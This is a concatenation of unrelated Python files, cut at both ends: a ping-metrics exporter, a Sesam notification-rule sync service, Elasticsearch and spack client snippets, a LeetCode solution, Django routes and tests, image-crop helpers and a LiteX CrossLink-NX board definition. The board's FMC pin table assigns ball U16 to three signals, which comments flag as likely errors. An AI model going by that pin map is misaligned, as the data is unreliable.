    # External targets without an explicit name are labelled by their host.
    for target in config["external_targets"]:
        target["name"] = target["host"] if "name" not in target.keys() else target["name"]

    # Remove label sets for targets that disappeared from the config; otherwise
    # their last exported values would linger forever.
    if labeled_prom_metrics["cluster_targets"]:
        for metric in labeled_prom_metrics["cluster_targets"]:
            if (metric["node_name"], metric["ip"]) not in [(node["name"], node["ipAddress"]) for node in config['cluster_targets']]:
                for k, v in prom_metrics_cluster.items():
                    v.remove(metric["node_name"], metric["ip"])

    if labeled_prom_metrics["external_targets"]:
        for metric in labeled_prom_metrics["external_targets"]:
            if (metric["target_name"], metric["host"]) not in [(target["name"], target["host"]) for target in config['external_targets']]:
                for k, v in prom_metrics_external.items():
                    v.remove(metric["target_name"], metric["host"])

    # Re-create labelled handles for the targets currently in the config.
    labeled_prom_metrics = {"cluster_targets": [], "external_targets": []}

    for node in config["cluster_targets"]:
        metrics = {"node_name": node["name"], "ip": node["ipAddress"], "prom_metrics": {}}

        for k, v in prom_metrics_cluster.items():
            metrics["prom_metrics"][k] = v.labels(node["name"], node["ipAddress"])

        labeled_prom_metrics["cluster_targets"].append(metrics)

    for target in config["external_targets"]:
        metrics = {"target_name": target["name"], "host": target["host"], "prom_metrics": {}}

        for k, v in prom_metrics_external.items():
            metrics["prom_metrics"][k] = v.labels(target["name"], target["host"])

        labeled_prom_metrics["external_targets"].append(metrics)

    # A single fping invocation covers all cluster and external targets.
    out = call_fping([prom_metric["ip"] for prom_metric in labeled_prom_metrics["cluster_targets"]] + \
                     [prom_metric["host"] for prom_metric in labeled_prom_metrics["external_targets"]])
    computed = compute_results(out)

    for dimension in labeled_prom_metrics["cluster_targets"]:
        result = computed[dimension["ip"]]
        dimension["prom_metrics"]["sent"].inc(result["sent"])
        dimension["prom_metrics"]["received"].inc(result["received"])
        dimension["prom_metrics"]["rtt"].inc(result["rtt"])
        dimension["prom_metrics"]["min"].set(result["min"])
        dimension["prom_metrics"]["max"].set(result["max"])
        dimension["prom_metrics"]["mdev"].set(result["mdev"])

    for dimension in labeled_prom_metrics["external_targets"]:
        # fping reports nothing for hosts it cannot resolve, so tolerate gaps.
        if dimension["host"] in computed:
            result = computed[dimension["host"]]
        else:
            sys.stderr.write("ERROR: fping hasn't reported results for host '" + dimension["host"] + "'. Possible DNS problems. Skipping host.\n")
            sys.stderr.flush()
            continue
        dimension["prom_metrics"]["sent"].inc(result["sent"])
        dimension["prom_metrics"]["received"].inc(result["received"])
        dimension["prom_metrics"]["rtt"].inc(result["rtt"])
        dimension["prom_metrics"]["min"].set(result["min"])
        dimension["prom_metrics"]["max"].set(result["max"])
        dimension["prom_metrics"]["mdev"].set(result["mdev"])

    # Hand the results to node-exporter's textfile collector.
    prometheus_client.write_to_textfile(
        envs["PROMETHEUS_TEXTFILE_DIR"] + envs["PROMETHEUS_TEXTFILE_PREFIX"] + envs["MY_NODE_NAME"] + ".prom", registry)
|
#!/usr/bin/env python
import json
import logging
import os
import re
import sys
from time import sleep
import sesamclient
import fnmatch
from portal import PortalConnection
# define required and optional environment variables
# Required variables abort startup when missing; optional ones fall back to
# defaults applied later in the bootstrap code.
required_env_vars = ["node_endpoint", "jwt", "rules"]
optional_env_vars = ["loglevel", "local_test", "interval", "notification_dataset", "microservice_logging"]
def str_to_bool(string_input):
    """Interpret *string_input* as a boolean: only a case-insensitive 'true' is True."""
    normalized = str(string_input).lower()
    return normalized == "true"
class AppConfig(object):
    """Bare attribute container; configuration values are attached via setattr."""
config = AppConfig()

# load variables
missing_env_vars = list()
for env_var in required_env_vars:
    value = os.getenv(env_var)
    if not value:
        # Collected (not raised) so all missing variables are reported at once.
        missing_env_vars.append(env_var)
    setattr(config, env_var, value)

for env_var in optional_env_vars:
    value = os.getenv(env_var)
    if value:
        setattr(config, env_var, value)

# Define logger
# NOTE(review): if microservice_logging is set but false-y, neither branch
# assigns format_string and the Formatter call below raises NameError —
# confirm whether that configuration is possible in deployment.
if hasattr(config, "microservice_logging"):
    if str_to_bool(config.microservice_logging):
        # No timestamp: the platform's log collector adds its own.
        format_string = ' - %(name)s - %(levelname)s - %(message)s'
else:
    format_string = '%(asctime)s - %(name)s - %(levelname)s - %(message)s'

logger = logging.getLogger('NotificationManager')
stdout_handler = logging.StreamHandler()
stdout_handler.setFormatter(logging.Formatter(format_string))
logger.addHandler(stdout_handler)
logger.setLevel({"INFO": logging.INFO,
                 "DEBUG": logging.DEBUG,
                 "WARN": logging.WARNING,
                 "ERROR": logging.ERROR}.get(os.getenv("loglevel", "INFO")))  # Default loglevel: INFO

if len(missing_env_vars) != 0:
    logger.error(f"Missing the following required environment variable(s) {missing_env_vars}")
    sys.exit(1)

# Local test mode reads rules from a bundled example file instead of the env.
if hasattr(config, "local_test"):
    if str_to_bool(config.local_test):
        with open('example_config.json', 'r') as f:
            raw_example = f.read()
        rules = json.loads(raw_example)
else:
    try:
        rules = json.loads(config.rules)
    except ValueError:
        logger.error("The 'rules' environment variable doesn't contain valid Json.")
        sys.exit(1)

# Todo: Validate all rules. Should contain: 'template', 'pipes'
# Todo: Validate all rules. Should contain: 'template', 'pipes'
def is_pattern_match(pattern, input_string):
    """Return True when *input_string* fully matches the glob-style *pattern*."""
    # fnmatch.translate turns the glob into an end-anchored regular expression.
    compiled = re.compile(fnmatch.translate(pattern))
    return compiled.match(input_string) is not None
def get_matching_rules(pipe_id):
    """Collect a template copy for every configured rule whose patterns match *pipe_id*.

    A rule contributes one copy per matching pattern, mirroring the
    module-level ``rules`` configuration.
    """
    matched = list()
    for rule_definition in rules:  # module-level rule configuration
        patterns = rule_definition.get("pipes")
        if not patterns:
            continue
        for pattern in patterns:
            if is_pattern_match(pattern, pipe_id):
                matched.append(rule_definition.get("template").copy())
    return matched
def push_unknown_notification_rules(connection, rules):
    """Record notification rules found on the node but absent from this service's config.

    Posts *rules* to the configured notification dataset, retrying up to three
    times; falls back to logging when no dataset is configured or all attempts
    fail.
    """
    if hasattr(config, "notification_dataset") and config.notification_dataset != "":
        logger.info("Pushing unknown notification rules to notifier dataset")
        # TODO: should look into getting a better retry mechanism from the sesam client
        retry_count = 0
        success = False
        while retry_count < 3 and not success:
            try:
                connection.get_pipe(config.notification_dataset).post_entities(rules)
                success = True
            except Exception:  # was a bare except, which also swallowed SystemExit et al.
                retry_count += 1
                # Bug fix: only back off / report on failure. Previously this
                # branch also ran after a successful post, logging a bogus
                # "Failed to send" error on every success.
                if retry_count < 3:
                    sleep(3)
                else:
                    logger.error(f"Failed to send unknown notification rules to dataset. Dumping to log.\n{rules}")
    else:
        logger.info(f"No unknown notification warning dataset found. Dumping rules to log:\n{rules}")
# Create connections
# Node API connection (pipes, datasets) authenticated with the same JWT used
# for the portal.
node_conn = sesamclient.Connection(
    sesamapi_base_url=config.node_endpoint,
    jwt_auth_token=config.jwt,
    timeout=60)
portal_conn = PortalConnection(config.jwt)

# The subscription id comes from the node licence and scopes all portal calls.
subscription_id = node_conn.get_license().get("_id")
logger.debug(f"Node subscription_id: '{subscription_id}'")
while True:
    # get list of all pipes from node
    logger.info("Starting check for updated notification rules.")
    pipes = node_conn.get_pipes()
    # rule name -> {"pipes": [...], "body": rule} for node rules not in config
    manually_created = dict()
    for pipe in pipes:
        # get rules from portal endpoint
        logger.debug("Checking for rules matching pipe '{}'".format(pipe.id))
        matched_rules = list()
        matched_rules = get_matching_rules(pipe.id)
        if matched_rules:
            logger.debug("Found {} rules matching pipe '{}'.".format(len(matched_rules), pipe.id))
            existing_rules = portal_conn.get_pipe_notification_rules(subscription_id, pipe.id)
            update_count = 0
            matched_existence_rules = list()
            for rule in matched_rules:
                if rule:
                    try:
                        # Templates carry a <SUBSCRIPTION_ID> placeholder in
                        # their first recipient id; substitute the real id.
                        rule["recipients"][0]["id"] = (rule["recipients"][0]["id"]).replace("<SUBSCRIPTION_ID>", subscription_id)
                    except KeyError:
                        logger.error("Misconfigured rule. Make sure to follow the required layout from the example.")
                        continue
                    # Match configured rules to node rules by name so updates
                    # reuse the existing rule id.
                    same_name_existing_rule = None
                    for existing_rule in existing_rules:
                        if existing_rule.get("name") == rule.get("name"):
                            same_name_existing_rule = existing_rule
                            rule["id"] = existing_rule.get("id")
                            matched_existence_rules.append(rule)
                    if not rule == same_name_existing_rule:
                        if same_name_existing_rule:
                            logger.info("Updating existing rule '{}' for pipe '{}'".format(rule.get("name"), pipe.id))
                            portal_conn.update_pipe_notification_rule(subscription_id, pipe.id, rule.get("id"), rule)
                        else:
                            logger.info("Creating new rule '{}' for pipe '{}'".format(rule.get("name"), pipe.id))
                            portal_conn.add_pipe_notification_rule(subscription_id, pipe.id, rule)
                        update_count += 1
            if update_count == 0:
                logger.debug("No new/changed rules found for pipe '{}'".format(pipe.id))

            # check for rules created directly on the node that's not present in the microservice config
            manually_created_rules = list()
            for existing in existing_rules:
                if existing not in matched_existence_rules:
                    manually_created_rules.append(existing)
            if len(manually_created_rules) > 0:
                for manually in manually_created_rules:
                    rule_name = manually["name"]
                    logger.warning("Unregistered notification rule '{}' found on node for pipe '{}'"
                                   .format(rule_name, pipe.id))
                    # Group by rule name so each unknown rule is reported once
                    # with the full list of pipes it appears on.
                    if rule_name not in manually_created:
                        manually_created[rule_name] = {
                            "pipes": [pipe.id],
                            "body": manually
                        }
                    else:
                        manually_created[rule_name]["pipes"] = manually_created[rule_name]["pipes"] + [pipe.id]

    # Push unknown notification rules to node dataset in order to email developers about uncommitted rules
    if manually_created:
        sesam_entities = list()
        for rule_name, value in manually_created.items():
            sesam_entities.append({
                "_id": rule_name,
                "pipes_with_rule": value["pipes"],
                "body": value["body"]
            })
        push_unknown_notification_rules(node_conn, sesam_entities)

    logger.info("Finished notification check")
    sleep_interval = config.interval if hasattr(config, "interval") else 3600
    logger.info(f"Going to sleep. Will check again in {sleep_interval} seconds")
    sleep(int(sleep_interval))
|
import json
from elasticsearch import Elasticsearch, helpers
from collections import OrderedDict
from requests_html import HTMLSession
import urllib.parse as url_parse
# Fetch a single known document from the local Elasticsearch and print its body.
index_name = "raw"
doc_type = "twitter"

es = Elasticsearch("http://127.0.0.1:9200/") #localhost = 127.0.0.1:9200

# NOTE(review): doc_type-based APIs are deprecated in Elasticsearch 7 and
# removed in 8 — confirm the target server version supports this call.
get_data = es.get(index = index_name, doc_type = doc_type,id = 1)
print(get_data['_source'])
__author__ = "Vanessa Sochat"
__copyright__ = "Copyright 2021, Vanessa Sochat"
__license__ = "Apache-2.0 OR MIT"
# This is an example for doing a splicing (preliminary) analysis to make
# a prediction about whether a package will build or not. This means:
# 1. Starting with a package of interest
# 2. Getting all specs for that package
# 3. For each spec, finding all the dependencies with install file and symbolator results
# 4. Doing a diff between the working symbol space and the anticipated symbol space
# 5. Making a prediction based on not having new missing symbols!
## IMPORTANT: this is server itensive, and likely won't work when there are
# a large number of specs. Instead, the result files should be downloaded
# and parsed locally (an example will follow)
import os
import sys
import json
# Make the sibling directory containing spackmoncli importable.
here = os.path.dirname(os.path.abspath(__file__))
sys.path.insert(0, os.path.dirname(here))

from spackmoncli import SpackMonitorClient

# defaults to host=http:127.0.0.1 and prefix=ms1
client = SpackMonitorClient()

# Here is a package of interest! Let's get a spec for it.
specs = client.get_specs_by_name("curl")

# Keep a list of predictions
predictions = []

# We will loop through specs, but stop after we find one with analyzer results
for spec in specs:

    # Now for the spec we need to get a listing of analyzer results!
    # We can do a splice analysis for any spec that has symbolator-json
    results = client.get_analyzer_results_spec(spec["id"], "symbolator")

    # Here is what a results list looks like!
    # [{'filename': 'bin/curl', 'id': 2160, 'analyzer': 'symbolator', 'name': 'symbolator-json'}, ... ]
    if results:
        for result in results:

            # We are only interested in splicing for binaries (e.g., stuff in bin)
            if not result["filename"].startswith("bin"):
                continue

            # Get dependency specs
            contender_specs = client.get_splice_contenders(result["id"])
            for contender in contender_specs:
                print(
                    "Performing splicing for %s with %s %s %s"
                    % (
                        result["filename"],
                        contender["name"],
                        contender["version"],
                        contender["full_hash"],
                    )
                )
                # Each prediction compares the working symbol space against
                # the spliced-in contender's symbol space (server intensive).
                predictions.append(
                    client.get_splice_predictions(result["id"], contender["id"])
                )
    # Stop after the first spec that produced any predictions.
    if predictions:
        break

print("inspect predictions:")
import IPython

IPython.embed()

# Do we have a results directory?
results_dir = os.path.join(here, "results")
if not os.path.exists(results_dir):
    os.mkdir(results_dir)

# Optionally save results to file
with open(os.path.join(results_dir, "splice_analysis_results.json"), "w") as fd:
    fd.write(json.dumps(predictions, indent=4))
|
from typing import List
class Solution:
    def removeDuplicates(self, s: str, k: int) -> str:
        """Repeatedly remove runs of k equal adjacent characters (LeetCode 1209).

        A stack of [character, run_length] pairs tracks the collapsed prefix;
        a run is dropped the moment it reaches length k. Runs in O(n).
        """
        stack = []  # each entry: [character, current run length], run length < k
        for ch in s:
            if stack and stack[-1][0] == ch:
                # Extend the current run in place instead of pop/re-push.
                stack[-1][1] += 1
                if stack[-1][1] == k:
                    stack.pop()
            else:
                stack.append([ch, 1])
        # Build the result in one pass; the original prepended characters one
        # at a time (res = tmp[0] + res), which is O(n^2) on long inputs.
        return "".join(ch * count for ch, count in stack)
# Ad-hoc smoke test: "deeedbbcccbdaa" with k=3 collapses to "aa".
A = Solution()
s = "deeedbbcccbdaa"
k = 3
print(A.removeDuplicates(s,k))
|
from django.urls import path
from .views import BookListView, WriterListView, BookSubListView, WriterSubListView, \
SearchByGenres, CreateWriterView, CreateBookView, DeleteBookView, DeleteWriterView
urlpatterns = [
    path('books/', BookListView.as_view(), name='Book'),
    path('book/<item>/', BookSubListView.as_view(), name='BookSubList'),
    path('writers/', WriterListView.as_view(), name='Writer'),
    # Bug fix: this route was also named 'BookSubList', shadowing the book
    # route in reverse()/{% url %} lookups. Give it its own unique name.
    path('writer/<item>/', WriterSubListView.as_view(), name='WriterSubList'),
    path('Genre/<item>/', SearchByGenres.as_view(), name='SearchByGenres'),
    path('createwriter/', CreateWriterView.as_view(), name='CreateWriterView'),
    path('createbook/', CreateBookView.as_view(), name='CreateBookView'),
    path('deletebook/<int:id>/', DeleteBookView.as_view(), name='DeleteBookView'),
    path('deletewriter/<int:id>/', DeleteWriterView.as_view(), name='DeleteWriterView'),
]
|
from django.test import TestCase
from testly.models import TestRun as Run
class TestRuns(TestCase):
    """API tests for the /runs list and detail endpoints."""

    def setUp(self):
        # Two runs in different environments so the list endpoint has data.
        self.test_run1 = Run.objects.create(requested_by='Jenkins', path='test_runs.py', environment=1)
        self.test_run2 = Run.objects.create(requested_by='Jenkins', path='test_runs.py', environment=2)

    def test_runs_list(self):
        """/runs returns every created run (order-independent check)."""
        response = self.client.get('/runs')
        assert response.status_code == 200
        run_ids = [run['id'] for run in response.json()['results']]
        assert set(run_ids) == {self.test_run1.id, self.test_run2.id}

    def test_run_detail(self):
        """/runs/<id> returns the matching run."""
        response = self.client.get('/runs/{}'.format(self.test_run1.id))
        assert response.status_code == 200
        assert response.json()['id'] == self.test_run1.id
|
""" Various generic env utilties. """
def center_crop_img(img, crop_zoom):
    """Return the centered 1/crop_zoom-sized window of *img*.

    E.g. crop_zoom=2.0 keeps the middle half of both the width and the height.
    """
    height, width = img.shape[:2]
    cy, cx = height // 2, width // 2
    # Half-extent of the crop window along each axis.
    half_h = int((height // crop_zoom) // 2)
    half_w = int((width // crop_zoom) // 2)
    return img[cy - half_h:cy + half_h, cx - half_w:cx + half_w]
def crop_img(img, relative_corners):
    """Crop *img* to a box given by fractional corner coordinates.

    relative_corners = [[top_left_x, top_left_y], [bottom_right_x, bottom_right_y]],
    each value in [0, 1] relative to the image size; [[0, 0], [1, 1]] is the
    full image, [[0.5, 0.5], [1, 1]] the bottom-right quadrant.
    """
    (tl_x, tl_y), (br_x, br_y) = relative_corners
    height, width = img.shape[:2]
    x0, y0 = int(tl_x * width), int(tl_y * height)
    x1, y1 = int(br_x * width), int(br_y * height)
    # Rows are indexed by y, columns by x.
    return img[y0:y1, x0:x1]
#
# This file is part of LiteX-Boards.
#
# Copyright (c) 2020 David Corrigan <[email protected]>
# Copyright (c) 2020 Alan Green <[email protected]>
# SPDX-License-Identifier: BSD-2-Clause
from litex.build.generic_platform import *
from litex.build.lattice import LatticePlatform
from litex.build.lattice.programmer import LatticeProgrammer
# IOs ----------------------------------------------------------------------------------------------
# Board I/O definitions, keyed to the CrossLink-NX Evaluation Board user guide
# section numbers quoted in the comments below.
_io = [
    # Section 5.1 Clock sources
    ("clk12", 0, Pins("L13"), IOStandard("LVCMOS33")), # Ensure JP2 is installed
    # Clock signal is differential, but we only name the "p" side.
    ("clk125", 0, Pins("C12"), IOStandard("LVDS")),

    # 7.2. General Purpose Push Buttons - all logic zero when pressed
    ("gsrn", 0, Pins("G19"), IOStandard("LVCMOS33")),     # SW4
    ("programn", 0, Pins("E11"), IOStandard("LVCMOS33")), # SW5
    ("user_btn", 0, Pins("G14"), IOStandard("LVCMOS33")), # SW2
    ("user_btn", 1, Pins("G15"), IOStandard("LVCMOS33")), # SW3

    # Section 6.2 UART Topology
    # Requires installation of 0-ohm jumpers R15 and R17 to properly route signals
    # Note that it is R15 and R17, not R16 and R17 as stated in the user guide
    ("serial", 0,
        Subsignal("rx", Pins("F16"), IOStandard("LVCMOS33")),
        Subsignal("tx", Pins("F18"), IOStandard("LVCMOS33")),
    ),

    # Section 7.3 General Purpose LEDs
    ("user_led", 0, Pins("E17"), IOStandard("LVCMOS33")),  # Bank 1 Green
    ("user_led", 1, Pins("F13"), IOStandard("LVCMOS33")),  # Bank 1 Green
    ("user_led", 2, Pins("G13"), IOStandard("LVCMOS33")),  # Bank 1 Green
    ("user_led", 3, Pins("F14"), IOStandard("LVCMOS33")),  # Bank 1 Green
    ("user_led", 4, Pins("L16"), IOStandard("LVCMOS33")),  # Bank 1 Green
    ("user_led", 5, Pins("L15"), IOStandard("LVCMOS33")),  # Bank 1 Green
    ("user_led", 6, Pins("L20"), IOStandard("LVCMOS33")),  # Bank 1 Green
    ("user_led", 7, Pins("L19"), IOStandard("LVCMOS33")),  # Bank 1 Green
    ("user_led", 8, Pins("R17"), IOStandard("LVCMOS33")),  # Bank 2 Green
    ("user_led", 9, Pins("R18"), IOStandard("LVCMOS33")),  # Bank 2 Green
    ("user_led", 10, Pins("U20"), IOStandard("LVCMOS33")), # Bank 2 Green
    ("user_led", 11, Pins("T20"), IOStandard("LVCMOS33")), # Bank 2 Green
    ("user_led", 12, Pins("W20"), IOStandard("LVCMOS33")), # Bank 2 Yellow
    ("user_led", 13, Pins("V20"), IOStandard("LVCMOS33")), # Bank 2 Yellow

    # Section 7.1 DIP Switch
    ("user_dip_btn", 0, Pins("N14"), IOStandard("LVCMOS33")),
    ("user_dip_btn", 1, Pins("M14"), IOStandard("LVCMOS33")),
    ("user_dip_btn", 2, Pins("M16"), IOStandard("LVCMOS33")),
    ("user_dip_btn", 3, Pins("M15"), IOStandard("LVCMOS33")),
    ("user_dip_btn", 4, Pins("N15"), IOStandard("LVCMOS33")),
    ("user_dip_btn", 5, Pins("N16"), IOStandard("LVCMOS33")),
    ("user_dip_btn", 6, Pins("M17"), IOStandard("LVCMOS33")),
    ("user_dip_btn", 7, Pins("M18"), IOStandard("LVCMOS33")),

    # Section 6.3.1. SPI Configuration
    ("spiflash", 0,
        Subsignal("cs_n", Pins("E13")),
        Subsignal("clk", Pins("E12")),
        Subsignal("mosi", Pins("D13")),
        Subsignal("miso", Pins("D15")),
        Subsignal("wp", Pins("D14")),
        Subsignal("hold", Pins("D16")),
        IOStandard("LVCMOS33")
    ),
    # Same flash in quad-I/O mode (dq shares the mosi/miso/wp/hold pins).
    ("spiflash4x", 0,
        Subsignal("cs_n", Pins("E13")),
        Subsignal("clk", Pins("E12")),
        Subsignal("dq", Pins("D13 D15 D14 D16")),
        IOStandard("LVCMOS33")
    ),

    # Section 8.2 Parallel FMC Configuration Connector
    ("fmc_config", 0,
        Subsignal("fmc_tck", Pins("P19")),   # 3
        Subsignal("ps_por_b", Pins("N19")),  # 4
        Subsignal("fmc_tdi", Pins("P20")),   # 7
        Subsignal("fmc_prsnt", Pins("N20")), # 8
        Subsignal("fmc_tdo", Pins("P17")),   # 9
        Subsignal("fmc_scl", Pins("M20")),   # 10
        Subsignal("fmc_tms", Pins("P18")),   # 13
        Subsignal("fmc_sda", Pins("M19")),   # 14
        IOStandard("LVCMOS33")
    ),
]
# Connectors ---------------------------------------------------------------------------------------
# Expansion connectors; pin comments give the physical connector position.
_connectors = [
    #TODO ADC
    #TODO D-PHY
    # Section 8.1 FMC LPC Connector
    # NOTE(review): FPGA ball "U16" is listed for LA31_N, LA28_N and LA30_N
    # below — a ball can only drive one signal, so at least two of these are
    # likely transcription errors; verify against the board schematic.
    ("FMC", {
        "LA06_P" : "W9",  # C10
        "LA06_N" : "Y9",  # C11
        "LA10_P" : "W10", # C14
        "LA10_N" : "Y10", # C15
        "LA14_P" : "W11", # C18
        "LA14_N" : "Y11", # C19
        "LA18_CC_P" : "R8", # C22
        "LA18_CC_N" : "T8", # C23
        "LA27_P" : "Y13", # C26
        "LA27_N" : "Y14", # C27
        "LA01_CC_P" : "W13", # D08
        "LA01_CC_N" : "V12", # D09
        "LA05_P" : "R5",  # D11
        "LA05_N" : "R6",  # D12
        "LA09_P" : "V6",  # D14
        "LA09_N" : "U7",  # D15
        "LA13_P" : "R9",  # D17
        "LA13_N" : "P9",  # D18
        "LA17_P" : "U10", # D20
        "LA17_N" : "V10", # D21
        "LA23_P" : "P11", # D23
        "LA23_N" : "R11", # D24
        "LA26_P" : "T13", # D26
        "LA26_N" : "T14", # D27
        "CLK1_P" : "R7",  # G02
        "CLK1_N" : "T7",  # G03
        "LA00_CC_P" : "V11", # G06
        "LA00_CC_N" : "U11", # G07
        "LA03_P" : "W6",  # G09
        "LA03_N" : "Y6",  # G10
        "LA08_P" : "Y7",  # G12
        "LA08_N" : "Y8",  # G13
        "LA12_P" : "U1",  # G15
        "LA12_N" : "T1",  # G16
        "LA16_P" : "P7",  # G18
        "LA16_N" : "P8",  # G19
        "LA20_P" : "T10", # G21
        "LA20_N" : "T11", # G22
        "LA22_P" : "V14", # G24
        "LA22_N" : "U14", # G25
        "LA25_P" : "R12", # G27
        "LA25_N" : "P12", # G28
        "LA29_P" : "Y15", # G30
        "LA29_N" : "Y16", # G31
        "LA31_P" : "Y17", # G33
        "LA31_N" : "U16", # G34
        "VREF" : "T6",    # H01
        "VREFa" : "Y18",  # H01
        "CLK0_P" : "Y12", # H04
        "CLK0_N" : "W12", # H05
        "LA02_P" : "Y2",  # H07
        "LA02_N" : "Y3",  # H08
        "LA04_P" : "V1",  # H10
        "LA04_N" : "W1",  # H11
        "LA07_P" : "W7",  # H13
        "LA07_N" : "V7",  # H14
        "LA11_P" : "P10", # H16
        "LA11_N" : "R10", # H17
        "LA15_P" : "W8",  # H19
        "LA15_N" : "V9",  # H20
        "LA19_P" : "U12", # H22
        "LA19_N" : "T12", # H23
        "LA21_P" : "P13", # H25
        "LA21_N" : "R13", # H26
        "LA24_P" : "W14", # H28
        "LA24_N" : "W15", # H29
        "LA28_P" : "U15", # H31
        "LA28_N" : "U16", # H32
        "LA30_P" : "V17", # H34
        "LA30_N" : "U16", # H35
    }),
    # Section 8.3 Raspberry Pi Board GPIO Header
    ("RASP",
        "None", #  (no pin 0)
        "None", #  1 3.3V
        "None", #  2 5V
        "L6",   #  3 RASP_IO02
        "None", #  4 5V
        "L5",   #  5 RASP_IO03
        "None", #  6 GND
        "M3",   #  7 RASP_IO04
        "M2",   #  8 RASP_IO14
        "None", #  9 GND
        "L1",   # 10 RASP_IO15
        "L2",   # 11 RASP_IO17
        "R2",   # 12 RASP_IO18
        "R1",   # 13 RASP_IO27
        "None", # 14 GND
        "P2",   # 15 RASP_IO22
        "P1",   # 16 RASP_IO23
        "None", # 17 3.3V
        "K7",   # 18 RASP_IO24
        "N4",   # 19 RASP_IO10
        "None", # 20 GND
        "K6",   # 21 RASP_IO09
        "K5",   # 22 RASP_IO25
        "N7",   # 23 RASP_IO11
        "P6",   # 24 RASP_IO08
        "None", # 25 GND
        "N5",   # 26 RASP_IO07
        "M7",   # 27 RASP_ID_SD
        "M4",   # 28 RASP_ID_SC
        "K8",   # 29 RASP_IO05
        "None", # 30 GND
        "L7",   # 31 RASP_IO06
        "L8",   # 32 RASP_IO12
        "M5",   # 33 RASP_IO13
        "None", # 34 GND
        "M6",   # 35 RASP_IO19
        "N6",   # 36 RASP_IO16
        "P5",   # 37 RASP_IO26
        "R3",   # 38 RASP_IO20
        "None", # 39 GND
        "R4",   # 40 RASP_IO21
    ),
    # Section 8.6 PMOD Header
    # PMOD signal number:
    #          1  2  3  4  7  8  9 10
    ("PMOD0", "D10 D9 D7 D8 D6 D5 D4 D3"),
    ("PMOD1", "E10 E9 E7 E8 E4 E3 E2 F1"),
    ("PMOD2", "J2 J1 K2 K1 K3 K4 D17 E18"),
]
# Test and Demo ------------------------------------------------------------------------------------
# Extra serial port definitions mapping UART rx/tx onto PMOD pins 1 and 2 of
# each header, for test and demo designs.
serial_pmods = [
    ("serial_pmod0", 0,
        Subsignal("rx", Pins("PMOD0:0"), IOStandard("LVCMOS33")),
        Subsignal("tx", Pins("PMOD0:1"), IOStandard("LVCMOS33")),
    ),
    ("serial_pmod1", 0,
        Subsignal("rx", Pins("PMOD1:0"), IOStandard("LVCMOS33")),
        Subsignal("tx", Pins("PMOD1:1"), IOStandard("LVCMOS33")),
    ),
    ("serial_pmod2", 0,
        Subsignal("rx", Pins("PMOD2:0"), IOStandard("LVCMOS33")),
        Subsignal("tx", Pins("PMOD2:1"), IOStandard("LVCMOS33")),
    ),
]
# Platform -----------------------------------------------------------------------------------------
class Platform(LatticePlatform):
    """Lattice CrossLink-NX (LIFCL-40) Evaluation Board platform for the Radiant toolchain."""

    def __init__(self, device="LIFCL", **kwargs):
        # Only the LIFCL (CrossLink-NX) family is populated on this board.
        assert device in ["LIFCL"]
        LatticePlatform.__init__(self, device + "-40-9BG400C", _io, _connectors, toolchain="radiant", **kwargs)

    def create_programmer(self, mode = "direct"):
        """Return a LatticeProgrammer; mode selects SRAM ("direct") or SPI-flash ("flash") programming.

        The templates below are Lattice programmer project (XCF) files with a
        {bitstream_file} placeholder substituted by the programmer.
        """
        assert mode in ["direct","flash"]

        # JTAG project for fast configuration straight into SRAM.
        xcf_template_direct = """<?xml version='1.0' encoding='utf-8' ?>
<!DOCTYPE ispXCF SYSTEM "IspXCF.dtd" >
<ispXCF version="R1.2.0">
    <Comment></Comment>
    <Chain>
        <Comm>JTAG</Comm>
        <Device>
            <SelectedProg value="TRUE"/>
            <Pos>1</Pos>
            <Vendor>Lattice</Vendor>
            <Family>LIFCL</Family>
            <Name>LIFCL-40</Name>
            <IDCode>0x010f1043</IDCode>
            <Package>All</Package>
            <PON>LIFCL-40</PON>
            <Bypass>
                <InstrLen>8</InstrLen>
                <InstrVal>11111111</InstrVal>
                <BScanLen>1</BScanLen>
                <BScanVal>0</BScanVal>
            </Bypass>
            <File>{bitstream_file}</File>
            <JedecChecksum>N/A</JedecChecksum>
            <MemoryType>Static Random Access Memory (SRAM)</MemoryType>
            <Operation>Fast Configuration</Operation>
            <Option>
                <SVFVendor>JTAG STANDARD</SVFVendor>
                <IOState>HighZ</IOState>
                <PreloadLength>362</PreloadLength>
                <IOVectorData>0xFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF</IOVectorData>
                <Usercode>0x00000000</Usercode>
                <AccessMode>Direct Programming</AccessMode>
            </Option>
        </Device>
    </Chain>
    <ProjectOptions>
        <Program>SEQUENTIAL</Program>
        <Process>ENTIRED CHAIN</Process>
        <OperationOverride>No Override</OperationOverride>
        <StartTAP>TLR</StartTAP>
        <EndTAP>TLR</EndTAP>
        <VerifyUsercode value="FALSE"/>
        <TCKDelay>3</TCKDelay>
    </ProjectOptions>
    <CableOptions>
        <CableName>USB2</CableName>
        <PortAdd>FTUSB-0</PortAdd>
    </CableOptions>
</ispXCF>
"""

        # JTAG2SPI project: erase/program/verify the external Macronix SPI
        # flash, loading a bridge into the FPGA SRAM first (FPGALoader).
        xcf_template_flash = """<?xml version='1.0' encoding='utf-8' ?>
<!DOCTYPE ispXCF SYSTEM "IspXCF.dtd" >
<ispXCF version="R1.2.0">
    <Comment></Comment>
    <Chain>
        <Comm>JTAG2SPI</Comm>
        <Device>
            <SelectedProg value="TRUE"/>
            <Pos>1</Pos>
            <Vendor>Lattice</Vendor>
            <Family>LIFCL</Family>
            <Name>LIFCL-40</Name>
            <Package>All</Package>
            <Bypass>
                <InstrLen>8</InstrLen>
                <InstrVal>11111111</InstrVal>
                <BScanLen>1</BScanLen>
                <BScanVal>0</BScanVal>
            </Bypass>
            <File>{bitstream_file}</File>
            <MemoryType>External SPI Flash Memory (SPI FLASH)</MemoryType>
            <Operation>Erase,Program,Verify</Operation>
            <Option>
                <SVFVendor>JTAG STANDARD</SVFVendor>
                <Usercode>0x00000000</Usercode>
                <AccessMode>Direct Programming</AccessMode>
            </Option>
            <FPGALoader>
            <CPLDDevice>
                <Device>
                    <Pos>1</Pos>
                    <Vendor>Lattice</Vendor>
                    <Family>LIFCL</Family>
                    <Name>LIFCL-40</Name>
                    <IDCode>0x010f1043</IDCode>
                    <Package>All</Package>
                    <PON>LIFCL-40</PON>
                    <Bypass>
                        <InstrLen>8</InstrLen>
                        <InstrVal>11111111</InstrVal>
                        <BScanLen>1</BScanLen>
                        <BScanVal>0</BScanVal>
                    </Bypass>
                    <MemoryType>Static Random Access Memory (SRAM)</MemoryType>
                    <Operation>Refresh Verify ID</Operation>
                    <Option>
                        <SVFVendor>JTAG STANDARD</SVFVendor>
